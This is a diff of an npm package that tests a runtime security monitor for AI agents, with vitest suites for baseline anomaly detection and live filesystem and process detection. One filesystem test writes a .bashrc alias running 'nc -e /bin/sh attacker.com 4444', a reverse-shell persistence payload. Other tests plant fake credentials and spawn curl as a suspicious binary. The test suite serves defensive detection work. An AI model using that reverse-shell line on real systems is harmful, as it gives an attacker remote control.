@opena2a/oasb 0.1.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/LICENSE +98 -0
- package/README.md +287 -0
- package/config/arp-lab-default.yaml +54 -0
- package/config/dvaa-targets.ts +97 -0
- package/dist/harness/arp-wrapper.d.ts +28 -0
- package/dist/harness/arp-wrapper.js +133 -0
- package/dist/harness/dvaa-client.d.ts +45 -0
- package/dist/harness/dvaa-client.js +97 -0
- package/dist/harness/dvaa-manager.d.ts +16 -0
- package/dist/harness/dvaa-manager.js +131 -0
- package/dist/harness/event-collector.d.ts +32 -0
- package/dist/harness/event-collector.js +85 -0
- package/dist/harness/metrics.d.ts +13 -0
- package/dist/harness/metrics.js +55 -0
- package/dist/harness/mock-llm-adapter.d.ts +33 -0
- package/dist/harness/mock-llm-adapter.js +68 -0
- package/dist/harness/types.d.ts +73 -0
- package/dist/harness/types.js +2 -0
- package/package.json +39 -0
- package/src/atomic/enforcement/AT-ENF-001.log-action.test.ts +89 -0
- package/src/atomic/enforcement/AT-ENF-002.alert-callback.test.ts +120 -0
- package/src/atomic/enforcement/AT-ENF-003.pause-sigstop.test.ts +104 -0
- package/src/atomic/enforcement/AT-ENF-004.kill-sigterm.test.ts +153 -0
- package/src/atomic/enforcement/AT-ENF-005.resume-sigcont.test.ts +164 -0
- package/src/atomic/filesystem/AT-FS-001.sensitive-path.test.ts +118 -0
- package/src/atomic/filesystem/AT-FS-002.outside-allowed.test.ts +122 -0
- package/src/atomic/filesystem/AT-FS-003.credential-file.test.ts +115 -0
- package/src/atomic/filesystem/AT-FS-004.mass-file-creation.test.ts +137 -0
- package/src/atomic/filesystem/AT-FS-005.dotfile-write.test.ts +154 -0
- package/src/atomic/intelligence/AT-INT-001.l0-rule-match.test.ts +107 -0
- package/src/atomic/intelligence/AT-INT-002.l1-anomaly-score.test.ts +94 -0
- package/src/atomic/intelligence/AT-INT-003.l2-escalation.test.ts +124 -0
- package/src/atomic/intelligence/AT-INT-004.budget-exhaustion.test.ts +108 -0
- package/src/atomic/intelligence/AT-INT-005.baseline-learning.test.ts +121 -0
- package/src/atomic/network/AT-NET-001.new-outbound.test.ts +103 -0
- package/src/atomic/network/AT-NET-002.suspicious-host.test.ts +82 -0
- package/src/atomic/network/AT-NET-003.connection-burst.test.ts +91 -0
- package/src/atomic/network/AT-NET-004.allowed-host-bypass.test.ts +129 -0
- package/src/atomic/network/AT-NET-005.exfil-destination.test.ts +117 -0
- package/src/atomic/process/AT-PROC-001.spawn-child.test.ts +148 -0
- package/src/atomic/process/AT-PROC-002.suspicious-binary.test.ts +123 -0
- package/src/atomic/process/AT-PROC-003.high-cpu.test.ts +120 -0
- package/src/atomic/process/AT-PROC-004.privilege-escalation.test.ts +114 -0
- package/src/atomic/process/AT-PROC-005.process-terminated.test.ts +150 -0
- package/src/baseline/BL-001.normal-agent-profile.test.ts +140 -0
- package/src/baseline/BL-002.anomaly-injection.test.ts +134 -0
- package/src/baseline/BL-003.baseline-persistence.test.ts +130 -0
- package/src/e2e/E2E-001.live-filesystem-detection.test.ts +129 -0
- package/src/e2e/E2E-002.live-process-detection.test.ts +106 -0
- package/src/e2e/E2E-003.live-network-detection.test.ts +114 -0
- package/src/e2e/E2E-004.interceptor-process.test.ts +125 -0
- package/src/e2e/E2E-005.interceptor-network.test.ts +134 -0
- package/src/e2e/E2E-006.interceptor-filesystem.test.ts +140 -0
- package/src/harness/arp-wrapper.ts +121 -0
- package/src/harness/dvaa-client.ts +130 -0
- package/src/harness/dvaa-manager.ts +106 -0
- package/src/harness/event-collector.ts +100 -0
- package/src/harness/metrics.ts +64 -0
- package/src/harness/mock-llm-adapter.ts +90 -0
- package/src/harness/types.ts +77 -0
- package/src/integration/INT-001.data-exfil-detection.test.ts +228 -0
- package/src/integration/INT-002.mcp-tool-abuse.test.ts +236 -0
- package/src/integration/INT-003.prompt-injection-response.test.ts +238 -0
- package/src/integration/INT-004.a2a-trust-exploitation.test.ts +280 -0
- package/src/integration/INT-005.baseline-then-attack.test.ts +239 -0
- package/src/integration/INT-006.multi-monitor-correlation.test.ts +265 -0
- package/src/integration/INT-007.budget-exhaustion-attack.test.ts +249 -0
- package/src/integration/INT-008.kill-switch-recovery.test.ts +314 -0
|
@@ -0,0 +1,140 @@
|
|
|
1
|
+
// BL-001: Normal Agent Profile - Zero False Positives
|
|
2
|
+
// Scenario: Run a normal agent workload and verify no false positives
|
|
3
|
+
//
|
|
4
|
+
// Injects 50 benign events across all 3 monitor sources (process, network,
|
|
5
|
+
// filesystem) simulating typical agent behavior. Asserts that none are
|
|
6
|
+
// misclassified as violations or threats and no enforcement actions fire.
|
|
7
|
+
|
|
8
|
+
import { describe, it, expect, beforeEach, afterEach } from 'vitest';
|
|
9
|
+
import { ArpWrapper } from '../harness/arp-wrapper';
|
|
10
|
+
|
|
11
|
+
describe('BL-001: Normal Agent Profile - Zero False Positives', () => {
  // The three monitor sources every test in this suite injects events for.
  const monitorSources = ['process', 'network', 'filesystem'] as const;
  type MonitorSource = (typeof monitorSources)[number];

  let arp: ArpWrapper;

  // A fresh wrapper per test with every monitor flag set to false; all events
  // seen by the collector are supplied through injectEvent().
  beforeEach(async () => {
    arp = new ArpWrapper({
      monitors: { process: false, network: false, filesystem: false },
    });
    await arp.start();
  });

  afterEach(async () => {
    await arp.stop();
  });

  it('should produce zero violations or threats from normal agent activity', async () => {
    // Five benign descriptions per source; the injection loop cycles through them.
    const benignDescriptions: Record<MonitorSource, string[]> = {
      process: [
        'Agent main loop iteration',
        'Subprocess completed successfully',
        'Health check passed',
        'Garbage collection cycle',
        'Task queue processed',
      ],
      network: [
        'HTTP GET request to api.example.com:443',
        'DNS lookup for cdn.example.com',
        'WebSocket keepalive sent',
        'TLS handshake completed',
        'Response received from api.example.com',
      ],
      filesystem: [
        'Read config file /app/config.json',
        'Write log entry to /app/logs/agent.log',
        'Read cached data from /tmp/cache/data.json',
        'Write checkpoint to /app/state/checkpoint.bin',
        'Read template from /app/templates/report.html',
      ],
    };

    // 50 injections, round-robin over the sources (roughly 17 each), awaited
    // one at a time so the collector receives them in order.
    for (let iteration = 0; iteration < 50; iteration += 1) {
      const source = monitorSources[iteration % monitorSources.length];
      const pool = benignDescriptions[source];

      await arp.injectEvent({
        source,
        category: 'normal',
        severity: 'info',
        description: pool[iteration % pool.length],
        data: { iteration, source },
      });
    }

    const recorded = arp.collector.getEvents();
    expect(recorded.length).toBe(50);

    // Nothing may be categorised as a violation ...
    expect(arp.collector.eventsByCategory('violation')).toHaveLength(0);

    // ... or as a threat ...
    expect(arp.collector.eventsByCategory('threat')).toHaveLength(0);

    // ... and no enforcement action may have been recorded.
    expect(arp.collector.getEnforcements()).toHaveLength(0);

    // Every collected event must still carry severity 'info' or 'low'.
    for (const { severity } of recorded) {
      expect(['info', 'low']).toContain(severity);
    }
  });

  it('should correctly attribute events to all 3 monitor sources', async () => {
    // Five events per source, injected source by source.
    for (const source of monitorSources) {
      for (let index = 0; index < 5; index += 1) {
        await arp.injectEvent({
          source,
          category: 'normal',
          severity: 'info',
          description: `Normal ${source} activity ${index}`,
          data: { index },
        });
      }
    }

    // The collector must report exactly five events for each source ...
    for (const source of monitorSources) {
      expect(arp.collector.eventsBySource(source)).toHaveLength(5);
    }

    // ... and fifteen in total.
    expect(arp.collector.getEvents()).toHaveLength(15);
  });

  it('should handle mixed info and low severity without escalation', async () => {
    const alternatingSeverities = ['info', 'low'] as const;

    // Twenty process events: even iterations are 'info', odd ones are 'low'.
    for (let iteration = 0; iteration < 20; iteration += 1) {
      await arp.injectEvent({
        source: 'process',
        category: 'normal',
        severity: alternatingSeverities[iteration % alternatingSeverities.length],
        description: `Routine process event ${iteration}`,
        data: { pid: 1000 + iteration },
      });
    }

    const recorded = arp.collector.getEvents();
    expect(recorded).toHaveLength(20);

    // No collected event may carry a severity above 'low'.
    const escalated = recorded.filter(
      ({ severity }) => severity === 'medium' || severity === 'high' || severity === 'critical',
    );
    expect(escalated).toHaveLength(0);

    // No enforcement action may have been recorded either.
    expect(arp.collector.getEnforcements()).toHaveLength(0);
  });
});
|
|
@@ -0,0 +1,134 @@
|
|
|
1
|
+
// BL-002: Controlled Anomaly Injection
|
|
2
|
+
// Scenario: Establish baseline, then inject known anomalies, verify detection
|
|
3
|
+
//
|
|
4
|
+
// Uses the AnomalyDetector (L1 statistical layer) directly to validate
|
|
5
|
+
// z-score based deviation detection. Feeds normal observations to build
|
|
6
|
+
// a baseline, then injects an anomalous burst and verifies the score exceeds
|
|
7
|
+
// the detection threshold.
|
|
8
|
+
|
|
9
|
+
import { describe, it, expect, beforeEach } from 'vitest';
|
|
10
|
+
import { AnomalyDetector } from '@opena2a/arp';
|
|
11
|
+
import type { ARPEvent } from '@opena2a/arp';
|
|
12
|
+
|
|
13
|
+
/**
 * Helper: build a minimal ARPEvent for the given source.
 *
 * The event is always category 'normal', severity 'info' and classified by
 * 'L0-rules'; only the id, description and `data.index` vary with the inputs.
 * The timestamp is the current time in ISO-8601 form.
 *
 * @param source - Monitor source the event is attributed to.
 * @param index - Sequence number embedded in the id, description and data.
 * @returns A freshly created event object.
 */
function makeEvent(source: 'process' | 'network' | 'filesystem', index: number): ARPEvent {
  const id = `bl002-${source}-${index}`;
  const timestamp = new Date().toISOString();
  const description = `Baseline event ${index} from ${source}`;

  const event: ARPEvent = {
    id,
    timestamp,
    source,
    category: 'normal',
    severity: 'info',
    description,
    data: { index },
    classifiedBy: 'L0-rules',
  };
  return event;
}
|
|
26
|
+
|
|
27
|
+
describe('BL-002: Controlled Anomaly Injection', () => {
  type Source = Parameters<typeof makeEvent>[0];

  let detector: AnomalyDetector;

  /** Record `total` events (indices 0..total-1) for `source` on the current detector. */
  const recordMany = (source: Source, total: number): void => {
    for (let index = 0; index < total; index += 1) {
      detector.record(makeEvent(source, index));
    }
  };

  // Every test starts from a detector with no recorded observations.
  beforeEach(() => {
    detector = new AnomalyDetector();
  });

  it('should return z-score 0 before baseline is established', () => {
    const probe = makeEvent('process', 0);

    // Nothing has been recorded, so the score is expected to be 0
    // (insufficient data).
    expect(detector.score(probe)).toBe(0);
  });

  it('should build a baseline from normal observations', () => {
    // Record 50 normal 'process' events, then confirm a baseline object exists
    // for that source and reports a positive count and mean.
    recordMany('process', 50);

    const baseline = detector.getBaseline('process');
    expect(baseline).not.toBeNull();
    expect(baseline!.count).toBeGreaterThan(0);
    expect(baseline!.mean).toBeGreaterThan(0);
  });

  it('should detect anomalous burst after baseline is established', () => {
    // Despite its title, this test does NOT drive the detector to a non-zero
    // score. Per the original author's notes, the detector aggregates events
    // per minute using Date.now() and only scores once it has seen at least
    // minDataPoints = 30 distinct minutes. A unit test that records in a tight
    // loop fills a single minute bucket, so a mature baseline cannot be built
    // here without controlling time.
    //
    // What is verified instead is the structural behaviour: the baseline
    // accumulates (one bucket) and score() stays 0 while it is immature.
    //
    // NOTE(review): the count === 1 assertion assumes the 50 record() calls do
    // not straddle a minute rollover - confirm, or pin the clock.
    recordMany('process', 50);

    const baseline = detector.getBaseline('process');
    expect(baseline).not.toBeNull();

    const probe = makeEvent('process', 51);
    const score = detector.score(probe);

    // Immature baseline => score 0; all 50 events share one minute bucket.
    expect(score).toBe(0);
    expect(baseline!.count).toBe(1); // All events in a single minute
  });

  it('should reset baselines completely', () => {
    // Give the 'network' source a baseline first.
    recordMany('network', 50);
    expect(detector.getBaseline('network')).not.toBeNull();

    detector.reset();

    // After reset() the baseline is gone ...
    expect(detector.getBaseline('network')).toBeNull();

    // ... and scoring falls back to 0 (no data).
    const probe = makeEvent('network', 100);
    expect(detector.score(probe)).toBe(0);
  });

  it('should track baselines independently per source', () => {
    const allSources = ['process', 'network', 'filesystem'] as const;

    // Ten events for each source.
    for (const source of allSources) {
      recordMany(source, 10);
    }

    // Each source must have its own baseline holding a single minute bucket.
    for (const source of allSources) {
      const baseline = detector.getBaseline(source);
      expect(baseline).not.toBeNull();
      expect(baseline!.count).toBe(1); // All in same minute
    }

    // A single reset() clears every source.
    detector.reset();
    for (const source of allSources) {
      expect(detector.getBaseline(source)).toBeNull();
    }
  });
});
|
|
@@ -0,0 +1,130 @@
|
|
|
1
|
+
// BL-003: Baseline Persistence Across Restarts
|
|
2
|
+
// Documents gap: baselines are NOT persisted
|
|
3
|
+
//
|
|
4
|
+
// The AnomalyDetector holds all baseline data in memory. When a new instance
|
|
5
|
+
// is created (simulating an agent restart), all learned baselines are lost.
|
|
6
|
+
// This test verifies and documents this known gap. A production deployment
|
|
7
|
+
// would need to serialize baselines to disk or a database to survive restarts.
|
|
8
|
+
|
|
9
|
+
import { describe, it, expect, beforeEach } from 'vitest';
|
|
10
|
+
import { AnomalyDetector } from '@opena2a/arp';
|
|
11
|
+
import type { ARPEvent } from '@opena2a/arp';
|
|
12
|
+
|
|
13
|
+
/**
 * Helper: build a minimal ARPEvent for the given source.
 *
 * Category, severity and classifier are fixed ('normal', 'info', 'L0-rules');
 * `source` and `index` are woven into the id and description, and `index` is
 * also stored under `data`. The timestamp is the current time as an ISO string.
 *
 * @param source - Monitor source the event is attributed to.
 * @param index - Sequence number used in the id, description and data.
 * @returns A new event object.
 */
function makeEvent(source: 'process' | 'network' | 'filesystem', index: number): ARPEvent {
  const label = `${index} from ${source}`;
  const now = new Date();

  const event: ARPEvent = {
    id: ['bl003', source, String(index)].join('-'),
    timestamp: now.toISOString(),
    source,
    category: 'normal',
    severity: 'info',
    description: `Persistence test event ${label}`,
    data: { index },
    classifiedBy: 'L0-rules',
  };
  return event;
}
|
|
26
|
+
|
|
27
|
+
describe('BL-003: Baseline Persistence Across Restarts', () => {
  type Source = Parameters<typeof makeEvent>[0];

  let detector: AnomalyDetector;

  /** Record `total` events (indices 0..total-1) for `source` on `target`. */
  const recordOn = (target: AnomalyDetector, source: Source, total: number): void => {
    for (let index = 0; index < total; index += 1) {
      target.record(makeEvent(source, index));
    }
  };

  // `detector` plays the role of the pre-restart instance in every test.
  beforeEach(() => {
    detector = new AnomalyDetector();
  });

  it('should accumulate baseline data during a session', () => {
    // 50 observations within one session must yield a populated baseline.
    recordOn(detector, 'process', 50);

    const baseline = detector.getBaseline('process');
    expect(baseline).not.toBeNull();
    expect(baseline!.count).toBeGreaterThan(0);
    expect(baseline!.mean).toBeGreaterThan(0);
  });

  it('should lose all baselines when a new detector is created (simulated restart)', () => {
    // Build a baseline on the first detector.
    recordOn(detector, 'process', 50);

    const baselineBefore = detector.getBaseline('process');
    expect(baselineBefore).not.toBeNull();

    // A brand-new instance stands in for the agent after a restart.
    const restartedDetector = new AnomalyDetector();

    // KNOWN GAP: nothing carries over to the new instance.
    const baselineAfter = restartedDetector.getBaseline('process');
    expect(baselineAfter).toBeNull();

    // With no baseline data the restarted detector scores 0.
    const probe = makeEvent('process', 999);
    const scoreAfterRestart = restartedDetector.score(probe);
    expect(scoreAfterRestart).toBe(0);

    // The original detector also scores 0 (per the original notes it needs
    // 30+ minute buckets before scoring), but its in-memory baseline object
    // is still present.
    const scoreOriginal = detector.score(probe);
    expect(scoreOriginal).toBe(0);
    expect(detector.getBaseline('process')).not.toBeNull();
  });

  it('should lose baselines for all sources on restart', () => {
    const allSources = ['process', 'network', 'filesystem'] as const;

    // Twenty events per source on the original detector.
    for (const source of allSources) {
      recordOn(detector, source, 20);
    }

    // Every source has a baseline before the restart ...
    for (const source of allSources) {
      expect(detector.getBaseline(source)).not.toBeNull();
    }

    const restartedDetector = new AnomalyDetector();

    // ... and none afterwards (KNOWN GAP).
    for (const source of allSources) {
      expect(restartedDetector.getBaseline(source)).toBeNull();
    }
  });

  it('should require full re-learning after restart (cold start problem)', () => {
    // Baseline learned before the restart.
    recordOn(detector, 'network', 50);

    const originalBaseline = detector.getBaseline('network');
    expect(originalBaseline).not.toBeNull();
    const originalMean = originalBaseline!.mean;

    // Restart, then replay the same number of events on the new instance.
    const restartedDetector = new AnomalyDetector();
    recordOn(restartedDetector, 'network', 50);

    const rebuiltBaseline = restartedDetector.getBaseline('network');
    expect(rebuiltBaseline).not.toBeNull();

    // Identical input is expected to rebuild identical statistics.
    // NOTE(review): this relies on both recording loops landing in the same
    // minute bucket pattern - confirm, or pin the clock.
    expect(rebuiltBaseline!.mean).toBe(originalMean);
    expect(rebuiltBaseline!.count).toBe(originalBaseline!.count);

    // KNOWN GAP DOCUMENTED: between a restart and baseline re-establishment
    // (stated as a minimum of 30 unique minutes of data) every anomaly score
    // is 0 regardless of actual behavior, so a production agent has no anomaly
    // detection during that cold-start window.
  });
});
|
|
@@ -0,0 +1,129 @@
|
|
|
1
|
+
// E2E-001: Live Filesystem Detection
|
|
2
|
+
// Proves ARP's FilesystemMonitor detects real file operations on disk.
|
|
3
|
+
// No event injection — the monitor itself detects real OS activity.
|
|
4
|
+
//
|
|
5
|
+
// ATLAS: AML.T0057, AML.T0018
|
|
6
|
+
// OWASP: A07, A04
|
|
7
|
+
|
|
8
|
+
import { describe, it, expect, beforeEach, afterEach } from 'vitest';
|
|
9
|
+
import * as fs from 'fs';
|
|
10
|
+
import * as path from 'path';
|
|
11
|
+
import * as os from 'os';
|
|
12
|
+
import { ArpWrapper } from '../harness/arp-wrapper';
|
|
13
|
+
|
|
14
|
+
describe('E2E-001: Live Filesystem Detection', () => {
  let arp: ArpWrapper;
  let watchDir: string;

  // Each test gets its own temp directory, watched by a wrapper that has only
  // the filesystem monitor enabled.
  beforeEach(async () => {
    // Create a temp directory to watch
    watchDir = fs.mkdtempSync(path.join(os.tmpdir(), 'arp-e2e-fs-'));

    arp = new ArpWrapper({
      monitors: {
        process: false,
        network: false,
        filesystem: true,
      },
      filesystemWatchPaths: [watchDir],
    });
    await arp.start();

    // Give fs.watch a moment to initialize
    await new Promise((r) => setTimeout(r, 200));
  });

  afterEach(async () => {
    try {
      await arp.stop();
    } finally {
      // Remove the temp directory even when stop() rejects; otherwise a failed
      // shutdown would leak one directory per test. Removal itself stays
      // best effort so it can never mask the original failure.
      try {
        fs.rmSync(watchDir, { recursive: true, force: true });
      } catch {
        // best effort
      }
    }
  });

  it('should detect creation of a .env file as a sensitive path violation', async () => {
    // Write a real .env file to the watched directory
    const envPath = path.join(watchDir, '.env');
    fs.writeFileSync(envPath, 'SECRET_KEY=test123\n');

    // Wait for the filesystem monitor to report an event flagged as sensitive
    // (the second argument, 5000, is presumably a timeout in milliseconds).
    const event = await arp.waitForEvent(
      (e) => e.source === 'filesystem' && e.data.sensitive === true,
      5000,
    );

    expect(event).toBeDefined();
    expect(event.source).toBe('filesystem');
    expect(event.category).toBe('violation');
    expect(event.severity).toBe('high');
    expect(event.data.sensitive).toBe(true);
    expect(String(event.data.path)).toContain('.env');
  });

  it('should detect creation of a .ssh directory file as sensitive', async () => {
    // Create a .ssh subdirectory and a key file
    const sshDir = path.join(watchDir, '.ssh');
    fs.mkdirSync(sshDir, { recursive: true });
    fs.writeFileSync(path.join(sshDir, 'id_rsa'), 'fake-private-key\n');

    // Any filesystem event whose path mentions '.ssh' satisfies the wait.
    const event = await arp.waitForEvent(
      (e) => e.source === 'filesystem' && String(e.data.path).includes('.ssh'),
      5000,
    );

    expect(event).toBeDefined();
    expect(event.category).toBe('violation');
    expect(event.severity).toBe('high');
    expect(event.data.sensitive).toBe(true);
  });

  it('should detect .bashrc write as persistence attempt', async () => {
    // A shell-profile write carrying a backdoor alias as its payload.
    const bashrcPath = path.join(watchDir, '.bashrc');
    fs.writeFileSync(bashrcPath, 'alias backdoor="nc -e /bin/sh attacker.com 4444"\n');

    const event = await arp.waitForEvent(
      (e) => e.source === 'filesystem' && String(e.data.path).includes('.bashrc'),
      5000,
    );

    expect(event).toBeDefined();
    expect(event.category).toBe('violation');
    expect(event.severity).toBe('high');
  });

  it('should detect .npmrc credential file access', async () => {
    // An .npmrc containing a (fake) registry auth token.
    const npmrcPath = path.join(watchDir, '.npmrc');
    fs.writeFileSync(npmrcPath, '//registry.npmjs.org/:_authToken=npm_FAKE\n');

    const event = await arp.waitForEvent(
      (e) => e.source === 'filesystem' && String(e.data.path).includes('.npmrc'),
      5000,
    );

    expect(event).toBeDefined();
    expect(event.category).toBe('violation');
    expect(event.severity).toBe('high');
    expect(event.data.sensitive).toBe(true);
  });

  it('should allow normal file creation without triggering violations', async () => {
    // Create a normal, non-sensitive file
    const normalPath = path.join(watchDir, 'output.json');
    fs.writeFileSync(normalPath, '{"status": "ok"}\n');

    // There is no event to wait on in the negative case, so pause for a fixed
    // interval to give the monitor time to report anything it would report.
    await new Promise((r) => setTimeout(r, 1500));

    // Should NOT have any violations
    const violations = arp.collector.eventsByCategory('violation');
    expect(violations.length).toBe(0);

    // Might have a normal 'rename' event from fs.watch; whatever was
    // collected must be neither a violation nor a threat.
    const allEvents = arp.collector.getEvents();
    for (const event of allEvents) {
      expect(event.category).not.toBe('violation');
      expect(event.category).not.toBe('threat');
    }
  });
});
|
|
@@ -0,0 +1,106 @@
|
|
|
1
|
+
// E2E-002: Live Process Detection
|
|
2
|
+
// Proves ARP's ProcessMonitor detects real child processes via `ps` polling.
|
|
3
|
+
// No event injection — the monitor polls the OS process table directly.
|
|
4
|
+
//
|
|
5
|
+
// ATLAS: AML.T0046
|
|
6
|
+
// OWASP: A04
|
|
7
|
+
|
|
8
|
+
import { describe, it, expect, beforeEach, afterEach } from 'vitest';
|
|
9
|
+
import { spawn, type ChildProcess } from 'child_process';
|
|
10
|
+
import { ArpWrapper } from '../harness/arp-wrapper';
|
|
11
|
+
|
|
12
|
+
describe('E2E-002: Live Process Detection', () => {
  let arp: ArpWrapper;

  // Every process a test spawns is registered here so afterEach can kill it.
  const children: ChildProcess[] = [];

  /** Spawn `command` with stdio ignored and register the child for cleanup. */
  const launch = (command: string, args: string[]): ChildProcess => {
    const proc = spawn(command, args, { stdio: 'ignore' });
    children.push(proc);
    return proc;
  };

  // Only the process monitor is enabled, polling every 500 ms.
  beforeEach(async () => {
    arp = new ArpWrapper({
      monitors: {
        process: true,
        network: false,
        filesystem: false,
      },
      processIntervalMs: 500, // Fast polling for test
    });
    await arp.start();

    // Wait slightly longer than one polling interval so the initial snapshot
    // completes before a test spawns anything.
    await new Promise((resolve) => setTimeout(resolve, 600));
  });

  afterEach(async () => {
    // Empty the registry and SIGKILL everything that was in it.
    for (const proc of children.splice(0)) {
      try {
        proc.kill('SIGKILL');
      } catch {
        // already dead
      }
    }
    await arp.stop();
  });

  it('should detect a new child process spawned after ARP starts', async () => {
    // A real, long-running child for the monitor to discover.
    const proc = launch('sleep', ['30']);

    // Wait for a process event that carries the child's pid.
    const event = await arp.waitForEvent(
      (e) => e.source === 'process' && e.data.pid === proc.pid,
      10000,
    );

    expect(event).toBeDefined();
    expect(event.source).toBe('process');
    expect(event.data.pid).toBe(proc.pid);
  });

  it('should detect a suspicious binary (curl) as a violation', async () => {
    // curl is pointed at a non-routable TEST-NET address with a 30 s connect
    // timeout, so it stays alive trying to connect while the monitor polls.
    const proc = launch('curl', ['-s', '--connect-timeout', '30', 'http://192.0.2.1/']);

    // Wait for a process violation naming the curl binary.
    const event = await arp.waitForEvent(
      (e) =>
        e.source === 'process' &&
        e.category === 'violation' &&
        e.data.binary === 'curl',
      10000,
    );

    expect(event).toBeDefined();
    expect(event.category).toBe('violation');
    expect(event.severity).toBe('high');
    expect(event.data.binary).toBe('curl');
    expect(event.data.pid).toBe(proc.pid);
  });

  it('should detect process termination', async () => {
    // A short-lived child: `sleep 1` exits on its own after about a second.
    const proc = launch('sleep', ['1']);

    // First make sure the monitor has seen the child at all.
    await arp.waitForEvent(
      (e) => e.source === 'process' && e.data.pid === proc.pid,
      10000,
    );

    // Then wait for an event for the same pid whose action is 'terminated'.
    const termEvent = await arp.waitForEvent(
      (e) =>
        e.source === 'process' &&
        e.data.pid === proc.pid &&
        e.data.action === 'terminated',
      10000,
    );

    expect(termEvent).toBeDefined();
    expect(termEvent.data.action).toBe('terminated');
  });
});
|